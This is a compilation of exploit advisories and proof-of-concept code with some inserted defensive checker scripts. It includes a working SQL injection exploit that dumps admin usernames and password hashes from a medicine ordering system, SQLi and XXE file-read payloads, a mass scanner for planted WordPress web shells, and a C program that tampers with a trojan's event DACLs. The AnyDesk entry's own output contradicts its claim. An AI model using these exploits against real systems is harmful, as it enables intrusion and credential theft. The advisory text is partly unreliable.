<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024
Original source: https://malvuln.com/advisory/0eb4a9089d3f7cf431d6547db3b9484d.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Trojan.Win32.Razy.abc
Vulnerability: Insecure Permissions (In memory IPC)
Family: Razy
Type: PE32
MD5: 0eb4a9089d3f7cf431d6547db3b9484d
SHA256: 3d82fee314e7febb8307ccf8a7396b6dd53c7d979a74aa56f3c4a6d0702fd098
Vuln ID: MVID-2024-0678
Dropped files: performer.exe
Disclosure: 04/07/2024
Description: The trojan installs a service under "C:\Program Files (x86)\SmartData" and runs with SYSTEM integrity. Terminating the malware service would typically require high integrity user privileges. However, standard low integrity users can successfully terminate it by exploiting insecure Win32 in-memory event objects "esnm" or "epp". Since no permissions are set on these IPC objects, a low integrity user can set the DACL to deny access for the Everyone group, then set and reset the event to cause the malware to terminate. Interestingly, I used the same technique to defeat RSA's EDR agent "netwitness" CVE-2022-47529.

PE file "performer.exe" is run using rundll32 RunHTMLApplication.

Win32 API Event objects.
performer.exe creates Event \BaseNamedObjects\epp ===> with no permissions set
svchost_ms.exe creates Event \BaseNamedObjects\esnm ===> with no permissions set

Exploit/PoC:
"Trojan_Razy_Exploit.c"

#include "windows.h"
#include "stdio.h"
#include "accctrl.h"
#include "aclapi.h"
#define OPEN_ALL_ACCESS 0x1F0003

/*
John Page (aka hyp3rlinx) - circa April of 2024 Malvuln project
Incorrect in-memory Win32 API access control allows termination of the malware service by a standard user.
Trojan.Win32.Razy.abc
MD5: 0eb4a9089d3f7cf431d6547db3b9484d
*/

/* Events the malware creates without a protecting DACL. "Global\" is the Win32 alias for \BaseNamedObjects. */
char Vuln_Events[][32] = {"Global\\esnm", "Global\\epp"};
BOOL PWNED = FALSE;

int main(void){

    PACL pOldDACL = NULL;
    PACL pNewDACL = NULL;
    PSECURITY_DESCRIPTOR pSD = NULL;   /* owns the buffer that pOldDACL points into */
    DWORD rc;
    int i = 0;

    for(; i < sizeof(Vuln_Events) / sizeof(Vuln_Events[0]); i++){
        /* OpenEvent returns NULL (not INVALID_HANDLE_VALUE) when the object cannot be opened. */
        HANDLE hEvent = OpenEventA(OPEN_ALL_ACCESS, FALSE, (LPCSTR)Vuln_Events[i]);

        if(hEvent == NULL){
            printf("[-] OpenEvent(%s) failed: %lu\n", Vuln_Events[i], GetLastError());
            continue;
        }
        if(!PWNED){
            printf("[+] Exploiting Trojan Razy Event: %s\n", Vuln_Events[i]);
        }

        rc = GetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, &pSD);
        if(rc == ERROR_SUCCESS){
            TRUSTEE trustee[1];
            trustee[0].TrusteeForm = TRUSTEE_IS_NAME;
            trustee[0].TrusteeType = TRUSTEE_IS_GROUP;
            trustee[0].ptstrName = TEXT("Everyone");
            trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;
            trustee[0].pMultipleTrustee = NULL;

            EXPLICIT_ACCESS explicit_access_list[1];
            ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS));

            /* Deny Everyone all access; merged with the existing DACL so the deny ACE is evaluated first. */
            explicit_access_list[0].grfAccessMode = DENY_ACCESS;
            explicit_access_list[0].grfAccessPermissions = GENERIC_ALL;
            explicit_access_list[0].grfInheritance = NO_INHERITANCE;
            explicit_access_list[0].Trustee = trustee[0];

            rc = SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL);
            if(rc != ERROR_SUCCESS){
                printf("[-] SetEntriesInAcl failed: %lu\n", rc);
            }else{
                rc = SetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL);
                if(rc != ERROR_SUCCESS){
                    printf("[-] SetSecurityInfo failed: %lu\n", rc);
                }else{
                    PWNED = TRUE;
                    /* Our handle was granted before the DACL changed, so signalling still works. */
                    SetEvent(hEvent);
                    Sleep(1000);
                    ResetEvent(hEvent);
                    Sleep(1000);
                }
                LocalFree(pNewDACL);
                pNewDACL = NULL;
            }
            LocalFree(pSD);   /* releases pOldDACL as well; never LocalFree the interior DACL pointer */
            pSD = NULL;
            pOldDACL = NULL;
        }else{
            printf("[-] GetSecurityInfo failed: %lu\n", rc);
        }
        CloseHandle(hEvent);
        Sleep(1000);
    }
    if(PWNED){
        printf("[+] Trojan.Win32.Razy.abc / MD5: 0eb4a9089d3f7cf431d6547db3b9484d PWNED!\n");
        PWNED = FALSE;
    }
    printf("[+] By malvuln... Done!\n");
    system("pause");
    return 666;
}


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
</code></pre>
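Added here as a check, not Malvuln's code: a Python script that opens the two events named above read-only, renders their DACL as SDDL through the Win32 API, and flags the conditions the technique above depends on: no DACL at all, or an allow ACE that hands Everyone, Users, Authenticated Users or Interactive either EVENT_MODIFY_STATE (signal the event) or WRITE_DAC/WRITE_OWNER (rewrite the DACL, which is what the PoC needs to add its deny ACE). The Win32 part (event_dacl_sddl) runs only on Windows; the SDDL evaluation (weak_aces, rights_mask) is pure Python and can be exercised offline. The default event names Global\esnm and Global\epp come from the advisory; any other name can be passed on the command line.

```python
import ctypes
import re
import sys

READ_CONTROL = 0x00020000            # enough to read the DACL, even from low integrity
SE_KERNEL_OBJECT = 6                 # SE_OBJECT_TYPE for events, mutexes, sections, ...
DACL_SECURITY_INFORMATION = 0x4
SDDL_REVISION_1 = 1

# Rights that let a caller signal the event or rewrite its DACL
EVENT_MODIFY_STATE, WRITE_DAC, WRITE_OWNER = 0x0002, 0x00040000, 0x00080000
GENERIC_WRITE, GENERIC_ALL = 0x40000000, 0x10000000
DANGEROUS = EVENT_MODIFY_STATE | WRITE_DAC | WRITE_OWNER | GENERIC_WRITE | GENERIC_ALL

# SDDL two-letter access codes that can show up on a kernel object
RIGHT_CODES = {"GA": GENERIC_ALL, "GW": GENERIC_WRITE, "GR": 0x80000000, "GX": 0x20000000,
               "WD": WRITE_DAC, "WO": WRITE_OWNER, "SD": 0x10000, "RC": 0x20000,
               "CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8, "RP": 0x10, "WP": 0x20,
               "DT": 0x40, "LO": 0x80, "CR": 0x100}
# Well-known SID aliases that any local user, low integrity included, falls under
BROAD_SIDS = {"WD": "Everyone", "BU": "Users", "AU": "Authenticated Users",
              "IU": "Interactive", "S-1-1-0": "Everyone"}
ACE_RE = re.compile(r"\((?P<type>[A-Z]+);(?P<flags>[^;]*);(?P<rights>[^;]*);[^;]*;[^;]*;(?P<sid>[^)]*)\)")


def rights_mask(text: str) -> int:
    """Turn an SDDL rights field (hex literal or run of two-letter codes) into an access mask."""
    text = text.strip()
    if not text:
        return 0
    if text.lower().startswith("0x"):
        return int(text, 16)
    mask = 0
    for i in range(0, len(text), 2):
        mask |= RIGHT_CODES.get(text[i:i + 2], 0)
    return mask


def weak_aces(sddl: str) -> list:
    """Findings for the D: part of an SDDL string; an empty list means no broad principal can modify the event."""
    m = re.search(r"D:(?P<flags>[A-Z_]*)(?P<aces>(?:\([^)]*\))*)", sddl)
    if m is None or "NO_ACCESS_CONTROL" in m.group("flags"):
        return ["no DACL: every principal, low-integrity users included, gets full access"]
    findings = []
    for ace in ACE_RE.finditer(m.group("aces")):
        if ace.group("type") != "A" or ace.group("sid") not in BROAD_SIDS:
            continue
        mask = rights_mask(ace.group("rights"))
        if mask & DANGEROUS:
            who = BROAD_SIDS[ace.group("sid")]
            findings.append(f"{who} granted 0x{mask:x}: can signal the event and/or rewrite its DACL")
    return findings


def event_dacl_sddl(name: str):
    """Windows only: open a named event read-only and return its DACL as SDDL, or None if it cannot be opened."""
    HANDLE, DWORD, BOOL = ctypes.c_void_p, ctypes.c_uint32, ctypes.c_int
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    adv = ctypes.WinDLL("advapi32", use_last_error=True)
    k32.OpenEventW.restype, k32.OpenEventW.argtypes = HANDLE, [DWORD, BOOL, ctypes.c_wchar_p]
    k32.CloseHandle.argtypes = [HANDLE]
    k32.LocalFree.argtypes = [ctypes.c_void_p]
    adv.GetSecurityInfo.restype = DWORD
    adv.GetSecurityInfo.argtypes = ([HANDLE, ctypes.c_int, DWORD] + [ctypes.c_void_p] * 4
                                    + [ctypes.POINTER(ctypes.c_void_p)])
    conv = adv.ConvertSecurityDescriptorToStringSecurityDescriptorW
    conv.restype = BOOL
    conv.argtypes = [ctypes.c_void_p, DWORD, DWORD, ctypes.POINTER(ctypes.c_wchar_p),
                     ctypes.POINTER(ctypes.c_uint32)]

    handle = k32.OpenEventW(READ_CONTROL, False, name)
    if not handle:
        return None
    psd, text = ctypes.c_void_p(), ctypes.c_wchar_p()
    try:
        if adv.GetSecurityInfo(handle, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION,
                               None, None, None, None, ctypes.byref(psd)) != 0:
            return None
        if not conv(psd, SDDL_REVISION_1, DACL_SECURITY_INFORMATION, ctypes.byref(text), None):
            return None
        return text.value
    finally:
        k32.LocalFree(ctypes.cast(text, ctypes.c_void_p))   # both LocalFree calls tolerate NULL
        k32.LocalFree(psd)
        k32.CloseHandle(handle)


if __name__ == "__main__":
    names = sys.argv[1:] or ["Global\\esnm", "Global\\epp"]   # the two events named in the advisory
    for name in names:
        sddl = event_dacl_sddl(name)
        if sddl is None:
            print(f"{name}: not present or not readable")
            continue
        print(f"{name}: {sddl}")
        for finding in weak_aces(sddl):
            print("  [!] " + finding)
```

Run it from a standard user account while the sample runs in an isolated VM: a result of D:NO_ACCESS_CONTROL, or an allow ACE for WD/BU/AU carrying 0x2 or 0x40000 in its mask, is exactly what the PoC above relies on. A service that wants its events private creates them with a SECURITY_ATTRIBUTES whose DACL grants access to SYSTEM and Administrators only, and nothing to Everyone.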
<pre><code># Exploit Title: AnyDesk 7.0.15 - Unquoted Service Path Privilege Escalation
# Date: 2024-04-01
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Vendor Homepage: http://anydesk.com
# Software Link: http://anydesk.com/download
# Version: Software Version 7.0.15
# Tested on: Windows 10 Pro x64

1. Description:

AnyDesk installs as a service with an unquoted service path running with SYSTEM privileges.
This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system.

Note that in the sc qc output below BINARY_PATH_NAME is enclosed in double quotes. A quoted path is unambiguous to the service control manager, so this output by itself does not demonstrate the unquoted condition. Before treating the service as exploitable, verify on the target that the path really is unquoted and that the low-privileged user can write to one of the directories the ambiguous path resolves through (for example C:\ or C:\Program Files (x86)\).

2. Proof

C:\>sc qc anydesk
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: anydesk
 TYPE : 10 WIN32_OWN_PROCESS
 START_TYPE : 2 AUTO_START
 ERROR_CONTROL : 1 NORMAL
 BINARY_PATH_NAME : "C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service
 LOAD_ORDER_GROUP :
 TAG : 0
 DISPLAY_NAME : AnyDesk Service
 DEPENDENCIES : RpcSs
 SERVICE_START_NAME : LocalSystem


C:\>systeminfo

OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19045 N/A Build 19045
OS Manufacturer: Microsoft Corporation
</code></pre>
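The check a practitioner wants before believing an unquoted-service-path claim, added here and not part of the advisory: parse the sc qc output, decide whether BINARY_PATH_NAME is quoted, and list the image paths the service control manager would try before the intended executable. The first sample below is the AnyDesk output shown above (with the wrapped --service rejoined to its line; it is quoted, so it yields no candidates); the second is a constructed copy of the same output with the quotes removed, to show what a real finding looks like. Whether a candidate directory is writable by the unprivileged user is not checked here.

```python
import re
from typing import Dict, List


def hijack_candidates(binary_path_name: str) -> List[str]:
    r"""Return the image paths Windows tries before the intended executable.

    For an unquoted path containing spaces, CreateProcess tries each space-delimited
    prefix with ".exe" appended (C:\Program.exe, then C:\Program Files.exe, ...) until
    one exists. A quoted path is unambiguous and yields []. Assumes the intended image
    name ends in ".exe" so the walk knows where the executable stops and arguments begin.
    """
    path = binary_path_name.strip()
    if path.startswith('"'):
        return []
    tokens = path.split(" ")
    candidates = []
    for i in range(1, len(tokens)):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(".exe"):
            break                       # reached the real image; the rest is arguments
        candidates.append(prefix + ".exe")
    return candidates


def parse_sc_qc(output: str) -> Dict[str, str]:
    """Pull the fields of interest out of `sc qc <service>` output."""
    fields = {}
    for key in ("SERVICE_NAME", "BINARY_PATH_NAME", "SERVICE_START_NAME", "START_TYPE"):
        m = re.search(rf"^\s*{key}\s*:\s*(.*?)\s*$", output, re.MULTILINE)
        if m:
            fields[key] = m.group(1)
    return fields


def assess(output: str) -> dict:
    """Combine both: is the path unquoted, what would be tried first, and who the service runs as."""
    fields = parse_sc_qc(output)
    candidates = hijack_candidates(fields.get("BINARY_PATH_NAME", ""))
    return {"service": fields.get("SERVICE_NAME"), "runs_as": fields.get("SERVICE_START_NAME"),
            "unquoted": bool(candidates), "candidates": candidates}


# Transcribed from the advisory's sc qc output (the wrapped "--service" joined back onto its line)
ANYDESK_SC_QC = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: anydesk
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : AnyDesk Service
        DEPENDENCIES       : RpcSs
        SERVICE_START_NAME : LocalSystem
"""

# Constructed variant with the quotes removed, to show what the finding would look like
UNQUOTED_SC_QC = ANYDESK_SC_QC.replace('"', '')

if __name__ == "__main__":
    for label, output in (("advisory output", ANYDESK_SC_QC), ("constructed unquoted variant", UNQUOTED_SC_QC)):
        print(label, "->", assess(output))
```

A hit is only meaningful when the user can create a file at one of the listed candidates; on a default Windows install C:\ and C:\Program Files (x86)\ are not writable by standard users, so check the ACLs (icacls) of each candidate's directory before reporting.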
<pre><code># Exploit Title: Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload
# Date: 2024-04-01
# Author: Milad Karimi (Ex3ptionaL)
# Category : webapps
# Tested on: windows 10 , firefox
#
# Note: the script does not upload anything. It probes each host for a fixed list of
# paths and looks for marker strings left by already-planted web shells (MSQ_403,
# "Yanz Webshell!", "#0x2525", "Uname:", "Simple Shell"); hosts where a marker is found
# are appended to the corresponding output file.

import sys
import os.path
import requests
import urllib3
from multiprocessing.dummy import Pool as ThreadPool
from colorama import Fore, init

init(autoreset=True)
error_color = Fore.RED
info_color = Fore.CYAN
success_color = Fore.GREEN
highlight_color = Fore.MAGENTA
urllib3.disable_warnings()

headers = {
    'Connection': 'keep-alive',
    'Cache-Control': 'max-age=0',
    'Upgrade-Insecure-Requests': '1',
    'User-Agent': 'Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
    'Referer': 'www.google.com'
}

# (scheme, path, marker expected in the response body, output file), tried in this order;
# the first hit ends the scan for that host.
CHECKS = [
    ('http://', '/wp-content/themes/travelscape/json.php', 'MSQ_403', 'MSQ_403.txt'),
    ('https://', '/wp-content/themes/aahana/json.php', 'MSQ_403', 'MSQ_403.txt'),
    ('https://', '/wp-content/themes/travel/issue.php', 'Yanz Webshell!', 'wso.txt'),
    ('https://', '/about.php', 'Yanz Webshell!', 'wso.txt'),
    ('https://', '/wp-content/themes/digital-download/new.php', '#0x2525', 'digital-download.txt'),
    ('http://', '/epinyins.php', 'Uname:', 'wso.txt'),
    ('https://', '/wp-admin/dropdown.php', 'Uname:', 'wso.txt'),
    ('https://', '/wp-content/plugins/dummyyummy/wp-signup.php', 'Simple Shell', 'dummyyummy.txt'),
]


def URLdomain(url):
    """Strip the scheme and any path so only host[:port] remains."""
    if url.startswith("http://"):
        url = url.replace("http://", "")
    elif url.startswith("https://"):
        url = url.replace("https://", "")
    if '/' in url:
        url = url.split('/')[0]
    return url


def check_security(url):
    fg = success_color
    fr = error_color
    domain = URLdomain(url)
    try:
        for scheme, path, marker, outfile in CHECKS:
            target = scheme + domain + path
            # TLS verification is disabled for every request (the original did so for its https probes)
            check = requests.get(target, headers=headers, allow_redirects=True,
                                 verify=False, timeout=15)
            if marker in check.text:
                print(' -| ' + target + ' --> {}[Successfully]'.format(fg))
                with open(outfile, 'a') as f:
                    f.write(target + '\n')
                return
            print(' -| ' + target + ' --> {}[Failed]'.format(fr))
    except Exception as e:
        print(f' -| {url} --> {fr}[Failed] due to: {e}')


def main():
    try:
        url_file_path = sys.argv[1]
    except IndexError:
        url_file_path = input(f"{info_color}Enter the path to the file containing URLs: ")
    if not os.path.isfile(url_file_path):
        print(f"{error_color}[ERROR] The specified file path is invalid.")
        sys.exit(1)
    try:
        with open(url_file_path, 'r', encoding='utf-8') as f:
            urls_to_check = [line.strip() for line in f if line.strip()]
    except Exception as e:
        print(f"{error_color}[ERROR] An error occurred while reading the file: {e}")
        sys.exit(1)
    pool = ThreadPool(20)
    pool.map(check_security, urls_to_check)
    pool.close()
    pool.join()
    print(f"{info_color}Security check process completed successfully. Results are saved in corresponding files.")


if __name__ == "__main__":
    main()
</code></pre>
<pre><code># Exploit Title: Daily Expense Manager 1.0 - 'term' SQLi<br /># Date: February 25th, 2024<br /># Exploit Author: Stefan Hesselman<br /># Vendor Homepage: https://code-projects.org/daily-expense-manager-in-php-with-source-code/<br /># Software Link: https://download-media.code-projects.org/2020/01/DAILY_EXPENSE_MANAGER_IN_PHP_WITH_SOURCE_CODE.zip<br /># Version: 1.0<br /># Tested on: Kali Linux<br /># CVE: N/A<br /># CWE: CWE-89, CWE-74<br /><br />## Description<br />Daily Expense Manager is vulnerable to SQL injection attacks. The affected HTTP parameter is the 'term' parameter. Any remote, unauthenticated attacker <br />can exploit the vulnerability by injecting additional, malicious SQL queries to be run on the database.<br /><br />## Vulnerable endpoint:<br />http://example.com/Daily-Expense-Manager/readxp.php?term=asd<br /><br />## Vulnerable HTTP parameter:<br />term (GET)<br /><br />## Exploit proof-of-concept:<br />http://example.com/Daily-Expense-Manager/readxp.php?term=asd%27%20UNION%20ALL%20SELECT%201,@@version,3,4,5,6--%20-<br /><br />## Vulnerable PHP code:<br />File: /Daily-Expense-Manager/readxp.php, Lines: 16-23<br /><?php<br />[...]<br />//get search term<br />$searchTerm = $_GET['term']; # unsanitized and under control of the attacker.<br />//get matched data from skills table<br />$query = $conn->query("SELECT * FROM expense WHERE pname like '%$searchTerm%' AND uid='$sid' and isdel='0' group by pname");<br />while ($row = $query->fetch_assoc()) {<br /> $data[] = $row['pname'];<br />}<br />//return json data<br />echo json_encode($data);<br />?><br /><br /></code></pre>
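Added here and not part of the advisory: the readxp.php query pattern reproduced in Python against an in-memory SQLite table, so the injection and its fix run side by side. The table layout (six columns, matching the six-value UNION in the proof of concept) and its rows are constructed; MySQL's @@version is swapped for SQLite's sqlite_version(), since SQLite has no @@version. vulnerable_search mirrors the PHP string concatenation; safe_search is the parameterised replacement.

```python
import sqlite3
from typing import List

SQLITE_VERSION = sqlite3.sqlite_version


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the application's expense table. Six columns, matching the
    six-value UNION in the proof of concept; the rows are constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE expense (
            id INTEGER PRIMARY KEY, pname TEXT, amount REAL,
            uid INTEGER, isdel TEXT, added TEXT);
        INSERT INTO expense (pname, amount, uid, isdel, added) VALUES
            ('Coffee', 3.5, 1, '0', '2024-02-01'),
            ('Bus ticket', 2.0, 1, '0', '2024-02-02'),
            ('Lunch', 9.0, 2, '0', '2024-02-02');
    """)
    return conn


def vulnerable_search(term: str, sid: int) -> List[str]:
    """readxp.php as written: the search term is pasted straight into the SQL text."""
    query = (f"SELECT * FROM expense WHERE pname like '%{term}%' "
             f"AND uid='{sid}' and isdel='0' group by pname")
    return [row[1] for row in make_db().execute(query)]


def safe_search(term: str, sid: int) -> List[str]:
    """Hardened form: a parameterised query. The term can only ever be a LIKE pattern,
    never SQL ('%' and '_' in it still act as wildcards; escape them if that matters)."""
    query = ("SELECT pname FROM expense WHERE pname LIKE ? AND uid = ? "
             "AND isdel = '0' GROUP BY pname")
    return [row[0] for row in make_db().execute(query, (f"%{term}%", sid))]


# The proof-of-concept payload, URL-decoded, with @@version replaced by sqlite_version()
PAYLOAD = "asd' UNION ALL SELECT 1,sqlite_version(),3,4,5,6-- -"

if __name__ == "__main__":
    print("vulnerable, normal term :", vulnerable_search("Coffee", 1))
    print("vulnerable, payload     :", vulnerable_search(PAYLOAD, 1))   # leaks the DB version
    print("parameterised, payload  :", safe_search(PAYLOAD, 1))         # matches nothing
```

With the payload, the interpolated statement becomes `... pname like '%asd' UNION ALL SELECT 1,sqlite_version(),3,4,5,6-- -%' AND uid=...`: the trailing `-- -` comments out the uid and isdel filters, so the UNION row comes back and the original row restriction is gone as well. The parameterised version sends the same bytes as a bound value and returns an empty list.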
<pre><code># Exploit Title : Open Source Medicine Ordering System v1.0 - SQLi
# Author : Onur Karasalihoğlu
# Date : 27/02/2024
'''
Sample Usage

% python3 omos_sqli_exploit.py https://target.com
Available Databases:
1. information_schema
2. omosdb
Please select a database to use (enter number): 2
You selected: omosdb
Extracted Admin Users Data:
1 | Adminstrator | Admin |  | 0192023a7bbd73250516f069df18b500 | admin
2 | John | Smith | D | 1254737c076cf867dc53d60a0364f38e | jsmith
'''

import requests
import re
import sys

# The injection point is the 'date' parameter of the admin reports page. A UNION with six
# columns is appended; JSON_ARRAYAGG() packs all rows into a single cell, and the 'enforsec'
# markers delimit that cell so it can be located inside the HTML response.


def fetch_database_names(domain):
    url = f"{domain}/admin/?page=reports&date=2024-02-22'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,CONCAT('enforsec',JSON_ARRAYAGG(CONCAT_WS(',',schema_name)),'enforsec')%20FROM%20INFORMATION_SCHEMA.SCHEMATA--%20-"

    try:
        # HTTP request
        response = requests.get(url)
        response.raise_for_status()  # exception for 4xx and 5xx responses

        # data extraction
        pattern = re.compile(r'enforsec\["(.*?)"\]enforsec')
        extracted_data = pattern.search(response.text)
        if extracted_data:
            databases = extracted_data.group(1).split(',')
            databases = [db.replace('"', '') for db in databases]
            print("Available Databases:")
            for i, db in enumerate(databases, start=1):
                print(f"{i}. {db}")

            # users should select omos database
            choice = int(input("Please select a database to use (enter number): "))
            if 0 < choice <= len(databases):
                selected_db = databases[choice - 1]
                print(f"You selected: {selected_db}")
                fetch_data(domain, selected_db)
            else:
                print("Invalid selection.")
        else:
            print("No data extracted.")
    except requests.RequestException as e:
        print(f"HTTP Request failed: {e}")


def fetch_data(domain, database_name):
    url = f"{domain}/admin/?page=reports&date=2024-02-22'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,CONCAT('enforsec',JSON_ARRAYAGG(CONCAT_WS(',',`type`,firstname,lastname,middlename,password,username)),'enforsec') FROM {database_name}.users-- -"

    try:
        # HTTP request
        response = requests.get(url)
        response.raise_for_status()  # exception for 4xx and 5xx responses

        # data extraction
        pattern = re.compile(r'enforsec\[(.*?)\]enforsec')
        extracted_data = pattern.search(response.text)
        if extracted_data:
            print("Extracted Admin Users Data:")
            data = extracted_data.group(1)
            rows = data.split('","')
            for row in rows:
                clean_row = row.replace('"', '')
                user_details = clean_row.split(',')
                print(" | ".join(user_details))
        else:
            print("No data extracted.")
    except requests.RequestException as e:
        print(f"HTTP Request failed: {e}")


def main():
    if len(sys.argv) != 2:
        print("Usage: python3 omos_sqli_exploit.py <domain>")
        sys.exit(1)

    fetch_database_names(sys.argv[1])


if __name__ == "__main__":
    main()
</code></pre>
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA512<br /><br />Title<br />=====<br /><br />SCHUTZWERK-SA-2023-006: Arbitrary File Read via XML External Entities in <br />Visual Planning<br /><br />Status<br />======<br /><br />PUBLISHED<br /><br />Version<br />=======<br /><br />1.0<br /><br />CVE reference<br />=============<br /><br />CVE-2023-49234<br /><br />Link<br />====<br /><br />https://www.schutzwerk.com/advisories/schutzwerk-sa-2023-006/<br /><br />Text-only version:<br />https://www.schutzwerk.com/advisories/SCHUTZWERK-SA-2023-006.txt<br /><br />Affected products/vendor<br />========================<br /><br />All versions prior to Visual Planning 8 (Build 240207) by STILOG I.S.T.<br /><br />Summary<br />=======<br /><br />Authenticated attackers can exploit a weakness in the XML parser <br />functionality of the Visual Planning[0] application in order to obtain <br />read access to arbitrary files on the application server. Depending on <br />configured access permissions, this vulnerability could be used by an <br />attacker to exfiltrate secrets stored on the local file system.<br /><br />Risk<br />====<br /><br />An attacker can use the vulnerability to gather information and, <br />depending on the stored data, exfiltrate secrets from the file system. <br />Furthermore, HTTP requests can be used for out-of-band exfiltration and <br />possibly server side request forgery (SSRF) attacks.<br /><br />Description<br />===========<br /><br />During a recent red teaming assessment, Visual Planning was identified <br />as part of the customer's internet-facing assets. The software is <br />developed by STILOG I.S.T. and provides resource management and <br />scheduling features. 
A security assessment conducted by SCHUTZWERK found <br />an arbitrary file read vulnerability via XML external entities in Visual <br />Planning.<br />The application Admin Center (vpadmin) communicates with the server <br />through an XML-based protocol that utilizes proprietary compression <br />methods and is transmitted via HTTP. SCHUTZWERK implemented a custom <br />proxy as part of an assessment in order to intercept and manipulate the <br />messages exchanged between application and server.<br /><br />One of the messages sent by the Admin Center application after <br />authentication is the following:<br /><br /><?xml version="1.0" encoding="UTF-8"?><br /><com.visualplanning.query.parameters.GetApplicationProperty><br /><defaultValue><br /><br /></defaultValue><br /><propertyName>PWD</propertyName><br /><rawResult>false</rawResult><br /><section>INSTALLDATA</section><br /><userSession isNull="true"/><br /></com.visualplanning.query.parameters.GetApplicationProperty><br /><br />The method GetApplicationProperty is called to request the value of the <br />property PWD. 
The server responds with an XML message, where the value <br />element contains the response of the query:<br /><br /><?xml version="1.0" encoding="UTF-8"?><br /><com.visualplanning.query.result.ApplicationPropertyResult><br /><resultValues/><br /><status>OK</status><br /><value><br /><br /></value><br /></com.visualplanning.query.result.ApplicationPropertyResult><br /><br />In this response it was observed that if the requested property value <br />could not be resolved, the content of the request element defaultValue <br />will be reflected as part of the response, making it a suitable back <br />channel for XML external entity (XXE) injections.<br /><br />The following message was sent to the Visual Planning application:<br /><br /><?xml version="1.0" encoding="UTF-8"?><br /><!DOCTYPE foo [<!ENTITY example SYSTEM <br />"C:\xampp2\tomcat\webapps\vplanning\configuration\install.properties"> ]><br /><com.visualplanning.query.parameters.GetApplicationProperty><br /><defaultValue>&example;</defaultValue><br /><propertyName>ShowBackground</propertyName><br /><rawResult>false</rawResult><br /><section>Application</section><br /><userSession isNull="true"/><br /></com.visualplanning.query.parameters.GetApplicationProperty><br /><br />The server responds with the content of the requested install.properties <br />file inside the value element, thus confirming the XML parser is <br />vulnerable to XML external entity (XXE) injections:<br /><br /><?xml version="1.0" encoding="UTF-8"?><br /><com.visualplanning.query.result.ApplicationPropertyResult><br /><resultValues/><br /><status>OK</status><br /><value>#<br />#Tue Oct 03 15:37:33 CEST 2023<br />INSTALLDATA.INSTALLSERIAL=<br />INSTALLDATA.INSTALLURL=http\://127.0.0.1\:8080/vplanning<br />INSTALLDATA.OK=Next<br />INSTALLDATA.PAGE=PROVIDER<br />INSTALLDATA.POOLMODE=1<br />INSTALLDATA.PORT=3306<br />INSTALLDATA.PROVIDERTYPE=MySQL<br />INSTALLDATA.PWD=ENCODE\:<br />INSTALLDATA.SERVER=127.0.0.1<br 
/>INSTALLDATA.SERVERLANG=de<br />INSTALLDATA.USER=root<br />INSTALLDATA.VIEWERSERIAL=<br /></value><br /></com.visualplanning.query.result.ApplicationPropertyResult><br /><br />Further testing showed that out-of-band exfiltration via HTTPS requests <br />is also generally possible.<br /><br />Solution/Mitigation<br />===================<br /><br />The vendor recommends updating to Visual Planning 8 (Build 240207).<br /><br />Disclosure timeline<br />===================<br /><br />2023-11-01: Vulnerability discovered<br />2023-11-09: Contact vendor in order to determine security contact<br />2023-11-10: Received generic sales response from vendor<br />2023-11-14: Contacted CTO of vendor directly<br />2023-11-16: Vulnerabilities demonstrated in call with contact at vendor<br />2023-11-24: CVE assigned by Mitre<br />2023-11-24: Additional technical details provided to vendor<br />2023-12-19: Vendor informed SCHUTZWERK that work on fixing the findings <br />is in progress<br />2024-01-30: Inquired about mitigation status regarding the reported <br />vulnerabilities<br />2024-01-30: Vendor informed SCHUTZWERK that some of the issues were <br />already fixed<br />2024-03-08: Sent advisory drafts to vendor<br />2024-03-28: Received patch information and release of advisory<br /><br />Contact/Credits<br />===============<br /><br />The vulnerability was discovered during an assessment by Lennert Preuth <br />and David Brown of SCHUTZWERK GmbH.<br /><br />References<br 